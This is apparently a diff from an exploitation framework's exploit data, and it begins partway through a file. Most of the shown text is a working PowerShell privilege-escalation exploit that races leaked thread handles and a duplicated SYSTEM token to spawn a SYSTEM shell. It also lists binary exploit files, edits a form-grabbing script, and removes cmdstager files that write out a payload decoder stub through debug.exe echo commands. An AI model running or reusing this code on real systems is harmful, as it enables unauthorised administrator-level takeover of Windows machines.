IntPtr ProcessHandle,
int DesiredAccess,
ref IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(
IntPtr ExistingTokenHandle,
int SECURITY_IMPERSONATION_LEVEL,
ref IntPtr DuplicateTokenHandle);
}
public static class Kernel32
{
[DllImport("kernel32.dll")]
public static extern uint GetLastError();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr GetCurrentThread();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern int GetThreadId(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern int GetProcessIdOfThread(IntPtr handle);
[DllImport("kernel32.dll",SetLastError=true)]
public static extern int SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll",SetLastError=true)]
public static extern int ResumeThread(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool TerminateProcess(
IntPtr hProcess,
uint uExitCode);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
IntPtr hSourceHandle,
IntPtr hTargetProcessHandle,
ref IntPtr lpTargetHandle,
int dwDesiredAccess,
bool bInheritHandle,
int dwOptions);
}
public static class Ntdll
{
[DllImport("ntdll.dll", SetLastError=true)]
public static extern int NtImpersonateThread(
IntPtr ThreadHandle,
IntPtr ThreadToImpersonate,
ref SQOS SecurityQualityOfService);
}
"@
function Get-ThreadHandle {
# StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO
$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
# ProcessInfo Struct
$ProcessInfo = New-Object PROCESS_INFORMATION
# CreateProcessWithLogonW --> lpCurrentDirectory
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
$path1 = $env:windir
$path1 = "$path1\System32\cmd.exe"
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
$CallResult = [Advapi32]::CreateProcessWithLogonW(
"user", "domain", "pass",
0x00000002, $path1, "",
0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo)
# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
$lpTargetHandle = [IntPtr]::Zero
$CallResult = [Kernel32]::DuplicateHandle(
$ProcessInfo.hProcess, 0x4,
[Kernel32]::GetCurrentProcess(),
[ref]$lpTargetHandle, 0, $false,
0x00000002)
# Clean up suspended process
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
$lpTargetHandle
}
function Get-SystemToken {
echo "`n[?] Trying thread handle: $Thread"
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
$CallResult = [Kernel32]::SuspendThread($Thread)
if ($CallResult -ne 0) {
echo "[!] $Thread is a bad thread, moving on.."
Return
} echo "[+] Thread suspended"
echo "[>] Wiping current impersonation token"
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
if (!$CallResult) {
echo "[!] SetThreadToken failed, moving on.."
$CallResult = [Kernel32]::ResumeThread($Thread)
echo "[+] Thread resumed!"
Return
}
echo "[>] Building SYSTEM impersonation token"
# SecurityQualityOfService struct
$SQOS = New-Object SQOS
$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
# Undocumented API's, I like your style Microsoft ;)
$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
if ($CallResult -ne 0) {
echo "[!] NtImpersonateThread failed, moving on.."
$CallResult = [Kernel32]::ResumeThread($Thread)
echo "[+] Thread resumed!"
Return
}
$script:SysTokenHandle = [IntPtr]::Zero
# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
if (!$CallResult) {
echo "[!] OpenThreadToken failed, moving on.."
$CallResult = [Kernel32]::ResumeThread($Thread)
echo "[+] Thread resumed!"
Return
}
echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
echo "[+] Resuming thread.."
$CallResult = [Kernel32]::ResumeThread($Thread)
}
# main() <--- ;)
# Check logical processor count, race condition requires 2+
echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
if ($([System.Environment]::ProcessorCount) -lt 2) {
echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
Return
}
# Create array for Threads & TID's
$ThreadArray = @()
$TidArray = @()
echo "[>] Duplicating CreateProcessWithLogonW handles.."
# Loop 1 is fine, this never fails unless patched in which case the handle is 0
for ($i=0; $i -lt 1; $i++) {
$hThread = Get-ThreadHandle
$hThreadID = [Kernel32]::GetThreadId($hThread)
# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
if ($TidArray -notcontains $hThreadID) {
$TidArray += $hThreadID
if ($hThread -ne 0) {
$ThreadArray += $hThread # This is what we need!
}
}
}
if ($($ThreadArray.length) -eq 0) {
echo "[!] No valid thread handles were captured, exiting!"
Return
} else {
echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
echo "`n[?] Thread handle list:"
$ThreadArray
}
echo "`n[*] Sniffing out privileged impersonation token.."
foreach ($Thread in $ThreadArray){
# Get handle to SYSTEM access token
Get-SystemToken
echo "`n[*] Sniffing out SYSTEM shell.."
echo "`n[>] Duplicating SYSTEM token"
$hDuplicateTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
# Simple PS runspace definition
echo "[>] Starting token race"
$Runspace = [runspacefactory]::CreateRunspace()
$StartTokenRace = [powershell]::Create()
$StartTokenRace.runspace = $Runspace
$Runspace.Open()
[void]$StartTokenRace.AddScript({
Param ($Thread, $hDuplicateTokenHandle)
while ($true) {
$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
}
}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
$AscObj = $StartTokenRace.BeginInvoke()
echo "[>] Starting process race"
# Adding a timeout (10 seconds) here to safeguard from edge-cases
$SafeGuard = [diagnostics.stopwatch]::StartNew()
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
# StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
# ProcessInfo Struct
$ProcessInfo = New-Object PROCESS_INFORMATION
# CreateProcessWithLogonW --> lpCurrentDirectory
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
$CallResult = [Advapi32]::CreateProcessWithLogonW(
"user", "domain", "pass",
0x00000002, $cmd, $args1,
0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo)
#---
# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
#---
# Missing this check used to cause the exploit to fail sometimes.
# If CreateProcessWithLogon fails OpenProcessToken won't succeed
# but we obviously don't have a SYSTEM shell :'( . Should be 100%
# reliable now!
#---
if (!$CallResult) {
continue
}
$hTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
# If we can't open the process token it's a SYSTEM shell!
if (!$CallResult) {
echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
$StartTokenRace.Stop()
$SafeGuard.Stop()
Return
}
# Clean up suspended process
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
}
# Kill runspace & stopwatch if edge-case
$StartTokenRace.Stop()
$SafeGuard.Stop()
}
exit

BIN
data/exploits/CVE-2016-4557/doubleput Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2016-4557/hello Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2016-4557/suidhelper Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2016-4997/2016-4997-decr.out Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2016-4997/2016-4997-pwn.out Normal file
View File

Binary file not shown.

BIN
data/exploits/R7_2015_17/stream.raw Normal file
View File

Binary file not shown.

BIN
data/exploits/capcom_sys_exec/capcom_sys_exec.x64.dll Executable file
View File

Binary file not shown.

2
data/exploits/capture/http/forms/grabforms.rb
View File

@ -28,7 +28,7 @@ File.readlines(sitelist).each do |site|
next if site =~ /^#/
out = File.join(output, site + ".txt")
File.unlink(out) if File.exists?(out)
File.unlink(out) if File.exist?(out)
fd = File.open(out, "a")

91
data/exploits/cmdstager/debug_asm
View File

@ -1,91 +0,0 @@
echo a 0100 >>decoder_stub
echo jmp 197 >>decoder_stub
echo mov bx,[1bd] >>decoder_stub
echo call 131 >>decoder_stub
echo mov bx,[1cc] >>decoder_stub
echo call 131 >>decoder_stub
echo mov ax,4c00 >>decoder_stub
echo int 21 >>decoder_stub
echo mov ah,3d >>decoder_stub
echo mov al,00 >>decoder_stub
echo mov dx,1bf >>decoder_stub
echo int 21 >>decoder_stub
echo mov [1bd],ax >>decoder_stub
echo ret >>decoder_stub
echo mov ah,3c >>decoder_stub
echo mov cx,2 >>decoder_stub
echo mov dx,1ce >>decoder_stub
echo int 21 >>decoder_stub
echo mov [1cc],ax >>decoder_stub
echo ret >>decoder_stub
echo mov ax,3e00 >>decoder_stub
echo int 21 >>decoder_stub
echo ret >>decoder_stub
echo mov bx,[1bd] >>decoder_stub
echo mov ax,3f00 >>decoder_stub
echo mov cx,100 >>decoder_stub
echo mov dx,0200 >>decoder_stub
echo int 21 >>decoder_stub
echo cmp ax,2 >>decoder_stub
echo ja 151 >>decoder_stub
echo call 178 >>decoder_stub
echo call 103 >>decoder_stub
echo ret >>decoder_stub
echo mov ah,0 >>decoder_stub
echo or al,20 >>decoder_stub
echo sub al,30 >>decoder_stub
echo cmp al,9 >>decoder_stub
echo jbe 164 >>decoder_stub
echo sub al,31 >>decoder_stub
echo cmp al,5 >>decoder_stub
echo ja 165 >>decoder_stub
echo add al,a >>decoder_stub
echo ret >>decoder_stub
echo mov ah,ff >>decoder_stub
echo ret >>decoder_stub
echo cmp bp,0 >>decoder_stub
echo jne 175 >>decoder_stub
echo call 137 >>decoder_stub
echo mov bp,ax >>decoder_stub
echo mov si,200 >>decoder_stub
echo lodsb >>decoder_stub
echo dec bp >>decoder_stub
echo ret >>decoder_stub
echo mov cx,di >>decoder_stub
echo sub cx,300 >>decoder_stub
echo mov bx,[1cc] >>decoder_stub
echo mov ax,4000 >>decoder_stub
echo mov dx,0300 >>decoder_stub
echo int 21 >>decoder_stub
echo ret >>decoder_stub
echo call 168 >>decoder_stub
echo call 152 >>decoder_stub
echo cmp ah,0 >>decoder_stub
echo jne 18b >>decoder_stub
echo ret >>decoder_stub
echo call 116 >>decoder_stub
echo call 123 >>decoder_stub
echo mov bp,0 >>decoder_stub
echo mov di,300 >>decoder_stub
echo call 18b >>decoder_stub
echo mov cx,1000 >>decoder_stub
echo mul cx >>decoder_stub
echo push ax >>decoder_stub
echo call 18b >>decoder_stub
echo pop dx >>decoder_stub
echo or al,dh >>decoder_stub
echo stosb >>decoder_stub
echo cmp bp, 0 >>decoder_stub
echo jne 1a3 >>decoder_stub
echo call 178 >>decoder_stub
echo jmp 1a0 >>decoder_stub
echo db 00,00 >>decoder_stub
echo db "testfile.dat",00 >>decoder_stub
echo db 00,00 >>decoder_stub
echo db "testfile.out",00 >>decoder_stub
echo  >>decoder_stub
echo r cx >>decoder_stub
echo 0400 >>decoder_stub
echo n h2b.com >>decoder_stub
echo w >>decoder_stub
echo q >>decoder_stub

819
data/exploits/cmdstager/debug_write
View File

@ -1,819 +0,0 @@
echo n decoder_stub.bin > decoder_stub
echo r cx >>decoder_stub
echo 1400 >>decoder_stub
echo f 0100 ffff 00 >>decoder_stub
echo e 100 4d 5a 90 >>decoder_stub
echo e 104 03 >>decoder_stub
echo e 108 04 >>decoder_stub
echo e 10c ff ff >>decoder_stub
echo e 110 b8 >>decoder_stub
echo e 118 40 >>decoder_stub
echo e 13c 80 >>decoder_stub
echo e 140 0e 1f ba 0e >>decoder_stub
echo e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 >>decoder_stub
echo e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 >>decoder_stub
echo e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 >>decoder_stub
echo e 180 50 45 >>decoder_stub
echo e 184 4c 01 03 >>decoder_stub
echo e 188 85 18 7c 48 >>decoder_stub
echo e 194 e0 >>decoder_stub
echo e 196 0e 01 0b 01 08 >>decoder_stub
echo e 19d 0a >>decoder_stub
echo e 1a1 08 >>decoder_stub
echo e 1a8 be 28 >>decoder_stub
echo e 1ad 20 >>decoder_stub
echo e 1b1 40 >>decoder_stub
echo e 1b6 40 >>decoder_stub
echo e 1b9 20 >>decoder_stub
echo e 1bd 02 >>decoder_stub
echo e 1c0 04 >>decoder_stub
echo e 1c8 04 >>decoder_stub
echo e 1d1 80 >>decoder_stub
echo e 1d5 02 >>decoder_stub
echo e 1dc 03 >>decoder_stub
echo e 1de 40 05 >>decoder_stub
echo e 1e2 10 >>decoder_stub
echo e 1e5 10 >>decoder_stub
echo e 1ea 10 >>decoder_stub
echo e 1ed 10 >>decoder_stub
echo e 1f4 10 >>decoder_stub
echo e 200 6c 28 >>decoder_stub
echo e 204 4f >>decoder_stub
echo e 209 40 >>decoder_stub
echo e 20c 30 05 >>decoder_stub
echo e 221 60 >>decoder_stub
echo e 224 0c >>decoder_stub
echo e 228 fc 27 >>decoder_stub
echo e 22c 1c >>decoder_stub
echo e 259 20 >>decoder_stub
echo e 25c 08 >>decoder_stub
echo e 268 08 20 >>decoder_stub
echo e 26c 48 >>decoder_stub
echo e 278 2e 74 65 78 74 >>decoder_stub
echo e 280 c4 08 >>decoder_stub
echo e 285 20 >>decoder_stub
echo e 289 0a >>decoder_stub
echo e 28d 02 >>decoder_stub
echo e 29c 20 >>decoder_stub
echo e 29f 60 2e 72 73 72 63 >>decoder_stub
echo e 2a8 30 05 >>decoder_stub
echo e 2ad 40 >>decoder_stub
echo e 2b1 06 >>decoder_stub
echo e 2b5 0c >>decoder_stub
echo e 2c4 40 >>decoder_stub
echo e 2c7 40 2e 72 65 6c 6f 63 >>decoder_stub
echo e 2d0 0c >>decoder_stub
echo e 2d5 60 >>decoder_stub
echo e 2d9 02 >>decoder_stub
echo e 2dd 12 >>decoder_stub
echo e 2ec 40 >>decoder_stub
echo e 2ef 42 >>decoder_stub
echo e 300 a0 28 >>decoder_stub
echo e 308 48 >>decoder_stub
echo e 30c 02 >>decoder_stub
echo e 30e 05 >>decoder_stub
echo e 310 24 21 >>decoder_stub
echo e 314 d8 06 >>decoder_stub
echo e 318 01 >>decoder_stub
echo e 31c 01 >>decoder_stub
echo e 31f 06 >>decoder_stub
echo e 350 13 30 04 >>decoder_stub
echo e 354 be >>decoder_stub
echo e 358 01 >>decoder_stub
echo e 35b 11 >>decoder_stub
echo e 35d 02 8e 69 17 fe 01 13 06 11 06 2d 12 >>decoder_stub
echo e 36a 72 01 >>decoder_stub
echo e 36e 70 28 10 >>decoder_stub
echo e 373 0a >>decoder_stub
echo e 376 38 9e >>decoder_stub
echo e 37c 02 16 9a 28 11 >>decoder_stub
echo e 383 0a 72 4b >>decoder_stub
echo e 388 70 72 4f >>decoder_stub
echo e 38d 70 6f 12 >>decoder_stub
echo e 392 0a 72 51 >>decoder_stub
echo e 397 70 72 4f >>decoder_stub
echo e 39c 70 6f 12 >>decoder_stub
echo e 3a1 0a 0a 06 6f 13 >>decoder_stub
echo e 3a8 0a 18 5b 8d 15 >>decoder_stub
echo e 3af 01 0b 16 0c 72 4f >>decoder_stub
echo e 3b7 70 0d 16 13 04 2b 21 >>decoder_stub
echo e 3bf 06 11 04 18 6f 14 >>decoder_stub
echo e 3c7 0a 0d 07 08 09 1f 10 28 15 >>decoder_stub
echo e 3d2 0a 9c 08 17 58 0c >>decoder_stub
echo e 3d9 11 04 18 58 13 04 11 04 06 6f 13 >>decoder_stub
echo e 3e6 0a fe 04 13 06 11 06 2d cf 02 16 9a 72 55 >>decoder_stub
echo e 3f6 70 28 16 >>decoder_stub
echo e 3fb 0a 28 17 >>decoder_stub
echo e 400 0a 13 05 11 05 07 16 07 8e 69 6f 18 >>decoder_stub
echo e 40e 0a >>decoder_stub
echo e 410 11 05 6f 19 >>decoder_stub
echo e 416 0a >>decoder_stub
echo e 419 2a 1e 02 28 1a >>decoder_stub
echo e 420 0a 2a >>decoder_stub
echo e 424 42 53 4a 42 01 >>decoder_stub
echo e 42a 01 >>decoder_stub
echo e 430 0c >>decoder_stub
echo e 434 76 32 2e 30 2e 35 30 37 32 37 >>decoder_stub
echo e 442 05 >>decoder_stub
echo e 444 6c >>decoder_stub
echo e 448 30 02 >>decoder_stub
echo e 44c 23 7e >>decoder_stub
echo e 450 9c 02 >>decoder_stub
echo e 454 d0 02 >>decoder_stub
echo e 458 23 53 74 72 69 6e 67 73 >>decoder_stub
echo e 464 6c 05 >>decoder_stub
echo e 468 60 >>decoder_stub
echo e 46c 23 55 53 >>decoder_stub
echo e 470 cc 05 >>decoder_stub
echo e 474 10 >>decoder_stub
echo e 478 23 47 55 49 44 >>decoder_stub
echo e 480 dc 05 >>decoder_stub
echo e 484 fc >>decoder_stub
echo e 488 23 42 6c 6f 62 >>decoder_stub
echo e 494 02 >>decoder_stub
echo e 497 01 47 15 02 >>decoder_stub
echo e 49c 09 >>decoder_stub
echo e 4a1 fa 01 33 >>decoder_stub
echo e 4a5 16 >>decoder_stub
echo e 4a8 01 >>decoder_stub
echo e 4ac 18 >>decoder_stub
echo e 4b0 02 >>decoder_stub
echo e 4b4 02 >>decoder_stub
echo e 4b8 01 >>decoder_stub
echo e 4bc 1a >>decoder_stub
echo e 4c0 0d >>decoder_stub
echo e 4c4 01 >>decoder_stub
echo e 4c8 01 >>decoder_stub
echo e 4cc 01 >>decoder_stub
echo e 4d2 0a >>decoder_stub
echo e 4d4 01 >>decoder_stub
echo e 4da 06 >>decoder_stub
echo e 4dc 36 >>decoder_stub
echo e 4de 2f >>decoder_stub
echo e 4e0 06 >>decoder_stub
echo e 4e2 5f >>decoder_stub
echo e 4e4 4d >>decoder_stub
echo e 4e6 06 >>decoder_stub
echo e 4e8 76 >>decoder_stub
echo e 4ea 4d >>decoder_stub
echo e 4ec 06 >>decoder_stub
echo e 4ee 93 >>decoder_stub
echo e 4f0 4d >>decoder_stub
echo e 4f2 06 >>decoder_stub
echo e 4f4 b2 >>decoder_stub
echo e 4f6 4d >>decoder_stub
echo e 4f8 06 >>decoder_stub
echo e 4fa cb >>decoder_stub
echo e 4fc 4d >>decoder_stub
echo e 4fe 06 >>decoder_stub
echo e 500 e4 >>decoder_stub
echo e 502 4d >>decoder_stub
echo e 504 06 >>decoder_stub
echo e 506 ff >>decoder_stub
echo e 508 4d >>decoder_stub
echo e 50a 06 >>decoder_stub
echo e 50c 1a 01 4d >>decoder_stub
echo e 510 06 >>decoder_stub
echo e 512 52 01 33 01 06 >>decoder_stub
echo e 518 66 01 33 01 06 >>decoder_stub
echo e 51e 74 01 4d >>decoder_stub
echo e 522 06 >>decoder_stub
echo e 524 8d 01 4d >>decoder_stub
echo e 528 06 >>decoder_stub
echo e 52a bd 01 aa 01 3b >>decoder_stub
echo e 530 d1 01 >>decoder_stub
echo e 534 06 >>decoder_stub
echo e 537 02 e0 01 06 >>decoder_stub
echo e 53c 20 02 e0 01 06 >>decoder_stub
echo e 542 3e 02 2f >>decoder_stub
echo e 546 06 >>decoder_stub
echo e 548 5a 02 50 02 06 >>decoder_stub
echo e 54e 6b 02 2f >>decoder_stub
echo e 552 06 >>decoder_stub
echo e 554 85 02 2f >>decoder_stub
echo e 558 06 >>decoder_stub
echo e 55a 94 02 2f >>decoder_stub
echo e 55e 06 >>decoder_stub
echo e 560 aa 02 50 02 06 >>decoder_stub
echo e 566 bc 02 50 02 >>decoder_stub
echo e 56e 01 >>decoder_stub
echo e 574 01 >>decoder_stub
echo e 576 01 >>decoder_stub
echo e 57a 10 >>decoder_stub
echo e 57c 16 >>decoder_stub
echo e 57e 1e >>decoder_stub
echo e 580 05 >>decoder_stub
echo e 582 01 >>decoder_stub
echo e 584 01 >>decoder_stub
echo e 586 50 20 >>decoder_stub
echo e 58c 91 >>decoder_stub
echo e 58e 3d >>decoder_stub
echo e 590 0a >>decoder_stub
echo e 592 01 >>decoder_stub
echo e 594 1a 21 >>decoder_stub
echo e 59a 86 18 42 >>decoder_stub
echo e 59e 10 >>decoder_stub
echo e 5a0 02 >>decoder_stub
echo e 5a4 01 >>decoder_stub
echo e 5a6 48 >>decoder_stub
echo e 5a8 11 >>decoder_stub
echo e 5aa 42 >>decoder_stub
echo e 5ac 14 >>decoder_stub
echo e 5ae 19 >>decoder_stub
echo e 5b0 42 >>decoder_stub
echo e 5b2 14 >>decoder_stub
echo e 5b4 21 >>decoder_stub
echo e 5b6 42 >>decoder_stub
echo e 5b8 14 >>decoder_stub
echo e 5ba 29 >>decoder_stub
echo e 5bc 42 >>decoder_stub
echo e 5be 14 >>decoder_stub
echo e 5c0 31 >>decoder_stub
echo e 5c2 42 >>decoder_stub
echo e 5c4 14 >>decoder_stub
echo e 5c6 39 >>decoder_stub
echo e 5c8 42 >>decoder_stub
echo e 5ca 14 >>decoder_stub
echo e 5cc 41 >>decoder_stub
echo e 5ce 42 >>decoder_stub
echo e 5d0 14 >>decoder_stub
echo e 5d2 49 >>decoder_stub
echo e 5d4 42 >>decoder_stub
echo e 5d6 14 >>decoder_stub
echo e 5d8 51 >>decoder_stub
echo e 5da 42 >>decoder_stub
echo e 5dc 19 >>decoder_stub
echo e 5de 59 >>decoder_stub
echo e 5e0 42 >>decoder_stub
echo e 5e2 14 >>decoder_stub
echo e 5e4 61 >>decoder_stub
echo e 5e6 42 >>decoder_stub
echo e 5e8 14 >>decoder_stub
echo e 5ea 69 >>decoder_stub
echo e 5ec 42 >>decoder_stub
echo e 5ee 14 >>decoder_stub
echo e 5f0 71 >>decoder_stub
echo e 5f2 42 >>decoder_stub
echo e 5f4 1e >>decoder_stub
echo e 5f6 81 >>decoder_stub
echo e 5f8 42 >>decoder_stub
echo e 5fa 24 >>decoder_stub
echo e 5fc 89 >>decoder_stub
echo e 5fe 42 >>decoder_stub
echo e 600 10 >>decoder_stub
echo e 602 91 >>decoder_stub
echo e 604 46 02 29 >>decoder_stub
echo e 608 99 >>decoder_stub
echo e 60a 5f 02 2e >>decoder_stub
echo e 60e a1 >>decoder_stub
echo e 610 72 02 33 >>decoder_stub
echo e 614 a1 >>decoder_stub
echo e 616 7a 02 39 >>decoder_stub
echo e 61a a1 >>decoder_stub
echo e 61c 8a 02 3d >>decoder_stub
echo e 620 b1 >>decoder_stub
echo e 622 9c 02 43 >>decoder_stub
echo e 626 a1 >>decoder_stub
echo e 628 a3 02 49 >>decoder_stub
echo e 62c 99 >>decoder_stub
echo e 62e b5 02 4f >>decoder_stub
echo e 632 c1 >>decoder_stub
echo e 634 c3 02 55 >>decoder_stub
echo e 638 c1 >>decoder_stub
echo e 63a c9 02 10 >>decoder_stub
echo e 63e 09 >>decoder_stub
echo e 640 42 >>decoder_stub
echo e 642 10 >>decoder_stub
echo e 644 2e >>decoder_stub
echo e 646 0b >>decoder_stub
echo e 648 69 >>decoder_stub
echo e 64a 2e >>decoder_stub
echo e 64c 13 >>decoder_stub
echo e 64e 76 >>decoder_stub
echo e 650 2e >>decoder_stub
echo e 652 1b >>decoder_stub
echo e 654 76 >>decoder_stub
echo e 656 2e >>decoder_stub
echo e 658 23 >>decoder_stub
echo e 65a 76 >>decoder_stub
echo e 65c 2e >>decoder_stub
echo e 65e 2b >>decoder_stub
echo e 660 69 >>decoder_stub
echo e 662 2e >>decoder_stub
echo e 664 33 >>decoder_stub
echo e 666 7c >>decoder_stub
echo e 668 2e >>decoder_stub
echo e 66a 3b >>decoder_stub
echo e 66c 76 >>decoder_stub
echo e 66e 2e >>decoder_stub
echo e 670 4b >>decoder_stub
echo e 672 76 >>decoder_stub
echo e 674 2e >>decoder_stub
echo e 676 53 >>decoder_stub
echo e 678 94 >>decoder_stub
echo e 67a 2e >>decoder_stub
echo e 67c 63 >>decoder_stub
echo e 67e be >>decoder_stub
echo e 680 2e >>decoder_stub
echo e 682 6b >>decoder_stub
echo e 684 cb >>decoder_stub
echo e 686 2e >>decoder_stub
echo e 688 73 >>decoder_stub
echo e 68a d4 >>decoder_stub
echo e 68c 2e >>decoder_stub
echo e 68e 7b >>decoder_stub
echo e 690 dd >>decoder_stub
echo e 692 5d >>decoder_stub
echo e 694 04 80 >>decoder_stub
echo e 698 01 >>decoder_stub
echo e 6a6 1e >>decoder_stub
echo e 6aa 02 >>decoder_stub
echo e 6b6 01 >>decoder_stub
echo e 6b8 26 >>decoder_stub
echo e 6c1 3c 4d 6f 64 75 6c 65 3e >>decoder_stub
echo e 6ca 68 65 78 32 62 69 6e 2e 65 78 65 >>decoder_stub
echo e 6d6 50 72 6f 67 72 61 6d >>decoder_stub
echo e 6de 68 65 78 32 62 69 6e >>decoder_stub
echo e 6e6 6d 73 63 6f 72 6c 69 62 >>decoder_stub
echo e 6ef 53 79 73 74 65 6d >>decoder_stub
echo e 6f6 4f 62 6a 65 63 74 >>decoder_stub
echo e 6fd 4d 61 69 6e >>decoder_stub
echo e 702 2e 63 74 6f 72 >>decoder_stub
echo e 708 61 72 67 73 >>decoder_stub
echo e 70d 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e >>decoder_stub
echo e 71f 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 >>decoder_stub
echo e 733 74 65 >>decoder_stub
echo e 736 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 >>decoder_stub
echo e 74a 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 753 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f >>decoder_stub
echo e 767 6e 41 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 772 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 >>decoder_stub
echo e 786 62 75 74 65 >>decoder_stub
echo e 78b 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 >>decoder_stub
echo e 79f 62 75 74 65 >>decoder_stub
echo e 7a4 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 >>decoder_stub
echo e 7b8 72 69 62 75 74 65 >>decoder_stub
echo e 7bf 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 >>decoder_stub
echo e 7d3 72 69 62 75 74 65 >>decoder_stub
echo e 7da 41 73 73 65 6d 62 6c 79 43 75 6c 74 75 72 65 41 74 74 72 69 >>decoder_stub
echo e 7ee 62 75 74 65 >>decoder_stub
echo e 7f3 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 >>decoder_stub
echo e 807 6f 70 53 65 72 76 69 63 65 73 >>decoder_stub
echo e 812 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 826 47 75 69 64 41 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 834 41 73 73 65 6d 62 6c 79 56 65 72 73 69 6f 6e 41 74 74 72 69 >>decoder_stub
echo e 848 62 75 74 65 >>decoder_stub
echo e 84d 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 >>decoder_stub
echo e 861 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 86a 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 >>decoder_stub
echo e 87d 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 891 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 >>decoder_stub
echo e 8a0 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 >>decoder_stub
echo e 8b4 6c 65 72 53 65 72 76 69 63 65 73 >>decoder_stub
echo e 8c0 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f >>decoder_stub
echo e 8d4 6e 73 41 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 8e0 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 >>decoder_stub
echo e 8f4 41 74 74 72 69 62 75 74 65 >>decoder_stub
echo e 8fe 43 6f 6e 73 6f 6c 65 >>decoder_stub
echo e 906 57 72 69 74 65 4c 69 6e 65 >>decoder_stub
